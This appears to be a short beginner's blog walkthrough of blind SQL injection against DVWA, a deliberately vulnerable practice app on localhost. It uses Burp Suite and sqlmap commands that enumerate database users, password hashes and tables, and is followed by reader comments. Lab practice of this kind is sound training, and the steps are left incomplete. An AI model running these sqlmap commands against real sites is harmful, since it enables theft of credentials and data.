- what it DVWA
DVWA dalah collection of tools hacking web-based PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. A variety of web hacking attack technique can be obtained from this tool. In addition to easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP application / XAMP / LAMP and others.
- first, make sure apache and mysql running
- run burp suite and klick OK
- open your web browser and set proxy and made to localhost
- then write the localhost/dvwa
- set DWVA Security be low
- and next klick SQL Injection (Blind).
- and look in brup suite, in red are proxy tab. klick and analyze
- look at the referer information
- then open the application sqlmap:
- we tried the username and password using the following command:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d2vng743ial33l18bo6eugbpt5" --string="Surname" --users --passwords
 |
- Now we try to get the database in dvwa:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d2vng743ial33l18bo6eugbpt5" --string="Surname" -D dvwa --tables
I found two tables, namely:
- Guestbook
- Users
- I am now trying to find the next user database
 |
I got it
|
- next., we try to view the content of the Colom password.
where is your IG and fbip exam??
BalasHapusand where is your dvwa sql injection???
update guiys.,
Hapusstill less is there.,
try to dump database :D
BalasHapusyaa., I will try to dump database
Hapuswhere the result of the databases?
BalasHapusdo not get. dude
Hapusstill confused
update dude.,
Hapus